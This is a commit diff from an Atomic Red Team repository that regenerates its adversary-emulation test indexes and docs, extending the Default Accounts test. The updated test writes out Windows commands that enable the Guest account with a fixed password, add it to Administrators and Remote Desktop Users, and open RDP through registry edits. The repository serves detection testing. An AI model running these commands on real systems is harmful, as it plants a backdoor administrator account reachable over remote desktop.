security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-08-07 14:44:32 +00:00
parent c4706bb0d9
commit a97f3f7e3a
6 changed files with 70 additions and 36 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Indexes-CSV/index.csv
+4 -4
View File
@@ -24,7 +24,7 @@ privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced fil
privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
@@ -103,7 +103,7 @@ persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057f
persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
persistence,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
@@ -239,7 +239,7 @@ defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload
defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
@@ -663,6 +663,6 @@ exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Al
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
initial-access,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
24 privilege-escalation T1053.003 Cron 2 Cron - Add script to cron folder b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
25 privilege-escalation T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
26 privilege-escalation T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
27 privilege-escalation T1078.001 Default Accounts 1 Enable Guest account Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
28 privilege-escalation T1546.014 Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
29 privilege-escalation T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
30 privilege-escalation T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
103 persistence T1053.003 Cron 2 Cron - Add script to cron folder b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
104 persistence T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
105 persistence T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
106 persistence T1078.001 Default Accounts 1 Enable Guest account Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
107 persistence T1546.014 Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
108 persistence T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
109 persistence T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
239 defense-evasion T1218.002 Control Panel 1 Control Panel Items 037e9d8a-9e46-4255-8b33-2ae3b545ca6f command_prompt
240 defense-evasion T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
241 defense-evasion T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
242 defense-evasion T1078.001 Default Accounts 1 Enable Guest account Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
243 defense-evasion T1140 Deobfuscate/Decode Files or Information 1 Deobfuscate/Decode Files Or Information dc6fe391-69e6-4506-bd06-ea5eeb4082f8 command_prompt
244 defense-evasion T1140 Deobfuscate/Decode Files or Information 2 Certutil Rename and Decode 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 command_prompt
245 defense-evasion T1562.002 Disable Windows Event Logging 1 Disable Windows IIS HTTP Logging 69435dcf-c66f-4ec0-a8b1-82beb76b34db powershell
663 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
664 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 2 Exfiltration Over Alternative Protocol - ICMP dd4b4421-2e25-4593-90ae-7021947ad12e powershell
665 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 3 Exfiltration Over Alternative Protocol - DNS c403b5a4-b5fc-49f2-b181-d1c80d27db45 manual
666 initial-access T1078.001 Default Accounts 1 Enable Guest account Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
667 initial-access T1566.001 Spearphishing Attachment 1 Download Phishing Attachment - VBScript 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
668 initial-access T1566.001 Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
atomics/Indexes/Indexes-CSV/windows-index.csv
+4 -4
View File
@@ -19,7 +19,7 @@ privilege-escalation,T1546.015,Component Object Model Hijacking,2,COM Hijack Lev
privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
@@ -74,7 +74,7 @@ defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload
defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
@@ -210,7 +210,7 @@ persistence,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging S
persistence,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
persistence,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
@@ -457,6 +457,6 @@ lateral-movement,T1021.006,Windows Remote Management,3,WMIC Process Call Create,
lateral-movement,T1021.006,Windows Remote Management,4,Psexec,9bab84a1-08fd-4245-b681-e62c78283002,command_prompt
lateral-movement,T1021.006,Windows Remote Management,5,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Windows Remote Management,6,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
initial-access,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
19 privilege-escalation T1546.015 Component Object Model Hijacking 3 COM Hijack Leveraging registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
20 privilege-escalation T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
21 privilege-escalation T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
22 privilege-escalation T1078.001 Default Accounts 1 Enable Guest account Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
23 privilege-escalation T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
24 privilege-escalation T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
25 privilege-escalation T1037.001 Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
74 defense-evasion T1218.002 Control Panel 1 Control Panel Items 037e9d8a-9e46-4255-8b33-2ae3b545ca6f command_prompt
75 defense-evasion T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
76 defense-evasion T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
77 defense-evasion T1078.001 Default Accounts 1 Enable Guest account Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
78 defense-evasion T1140 Deobfuscate/Decode Files or Information 1 Deobfuscate/Decode Files Or Information dc6fe391-69e6-4506-bd06-ea5eeb4082f8 command_prompt
79 defense-evasion T1140 Deobfuscate/Decode Files or Information 2 Certutil Rename and Decode 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 command_prompt
80 defense-evasion T1562.002 Disable Windows Event Logging 1 Disable Windows IIS HTTP Logging 69435dcf-c66f-4ec0-a8b1-82beb76b34db powershell
210 persistence T1546.015 Component Object Model Hijacking 3 COM Hijack Leveraging registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
211 persistence T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
212 persistence T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
213 persistence T1078.001 Default Accounts 1 Enable Guest account Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
214 persistence T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
215 persistence T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
216 persistence T1136.001 Local Account 3 Create a new user in a command prompt 6657864e-0323-4206-9344-ac9cd7265a4f command_prompt
457 lateral-movement T1021.006 Windows Remote Management 4 Psexec 9bab84a1-08fd-4245-b681-e62c78283002 command_prompt
458 lateral-movement T1021.006 Windows Remote Management 5 Invoke-Command 5295bd61-bd7e-4744-9d52-85962a4cf2d6 powershell
459 lateral-movement T1021.006 Windows Remote Management 6 WinRM Access with Evil-WinRM efe86d95-44c4-4509-ae42-7bfd9d1f5b3d powershell
460 initial-access T1078.001 Default Accounts 1 Enable Guest account Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
461 initial-access T1566.001 Spearphishing Attachment 1 Download Phishing Attachment - VBScript 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
462 initial-access T1566.001 Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
atomics/Indexes/Indexes-Markdown/index.md
+4 -4
View File
@@ -49,7 +49,7 @@
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -224,7 +224,7 @@
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -501,7 +501,7 @@
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
@@ -1262,7 +1262,7 @@
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
atomics/Indexes/Indexes-Markdown/windows-index.md
+4 -4
View File
@@ -40,7 +40,7 @@
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -159,7 +159,7 @@
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
@@ -412,7 +412,7 @@
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -953,7 +953,7 @@
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
atomics/Indexes/index.yaml
+44 -16
View File
@@ -2359,20 +2359,27 @@ privilege-escalation:
- SaaS
identifier: T1078.001
atomic_tests:
- name: Enable Guest account
- name: Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
description: After execution the Default Guest account will be enabled (Active)
and added to Administrators Group
and added to Administrators and Remote Desktop Users Group, and desktop will
allow multiple RDP connections
supported_platforms:
- windows
executor:
command: |
command: |-
net user guest /active:yes
net user guest Paswword123!
net user guest Password123!
net localgroup administrators guest /add
net localgroup "Remote Desktop Users" guest /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
cleanup_command: |-
net user guest /active:no
net localgroup administrators guest /delete
net localgroup "Remote Desktop Users" guest /delete
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f
name: command_prompt
elevation_required: true
T1078.002:
@@ -10806,20 +10813,27 @@ persistence:
- SaaS
identifier: T1078.001
atomic_tests:
- name: Enable Guest account
- name: Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
description: After execution the Default Guest account will be enabled (Active)
and added to Administrators Group
and added to Administrators and Remote Desktop Users Group, and desktop will
allow multiple RDP connections
supported_platforms:
- windows
executor:
command: |
command: |-
net user guest /active:yes
net user guest Paswword123!
net user guest Password123!
net localgroup administrators guest /add
net localgroup "Remote Desktop Users" guest /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
cleanup_command: |-
net user guest /active:no
net localgroup administrators guest /delete
net localgroup "Remote Desktop Users" guest /delete
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f
name: command_prompt
elevation_required: true
T1136.002:
@@ -23211,20 +23225,27 @@ defense-evasion:
- SaaS
identifier: T1078.001
atomic_tests:
- name: Enable Guest account
- name: Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
description: After execution the Default Guest account will be enabled (Active)
and added to Administrators Group
and added to Administrators and Remote Desktop Users Group, and desktop will
allow multiple RDP connections
supported_platforms:
- windows
executor:
command: |
command: |-
net user guest /active:yes
net user guest Paswword123!
net user guest Password123!
net localgroup administrators guest /add
net localgroup "Remote Desktop Users" guest /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
cleanup_command: |-
net user guest /active:no
net localgroup administrators guest /delete
net localgroup "Remote Desktop Users" guest /delete
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f
name: command_prompt
elevation_required: true
T1578.003:
@@ -52115,20 +52136,27 @@ initial-access:
- SaaS
identifier: T1078.001
atomic_tests:
- name: Enable Guest account
- name: Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
description: After execution the Default Guest account will be enabled (Active)
and added to Administrators Group
and added to Administrators and Remote Desktop Users Group, and desktop will
allow multiple RDP connections
supported_platforms:
- windows
executor:
command: |
command: |-
net user guest /active:yes
net user guest Paswword123!
net user guest Password123!
net localgroup administrators guest /add
net localgroup "Remote Desktop Users" guest /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
cleanup_command: |-
net user guest /active:no
net localgroup administrators guest /delete
net localgroup "Remote Desktop Users" guest /delete
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f
name: command_prompt
elevation_required: true
T1078.002:
atomics/T1078.001/T1078.001.md
+10 -4
View File
@@ -6,13 +6,13 @@ Default accounts are not limited to client machines, rather also include account
## Atomic Tests
- [Atomic Test #1 - Enable Guest account](#atomic-test-1---enable-guest-account)
- [Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges](#atomic-test-1---enable-guest-account-with-rdp-capability-and-admin-priviliges)
<br/>
## Atomic Test #1 - Enable Guest account
After execution the Default Guest account will be enabled (Active) and added to Administrators Group
## Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges
After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections
**Supported Platforms:** Windows
@@ -24,14 +24,20 @@ After execution the Default Guest account will be enabled (Active) and added to
```cmd
net user guest /active:yes
net user guest Paswword123!
net user guest Password123!
net localgroup administrators guest /add
net localgroup "Remote Desktop Users" guest /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
```
#### Cleanup Commands:
```cmd
net user guest /active:no
net localgroup administrators guest /delete
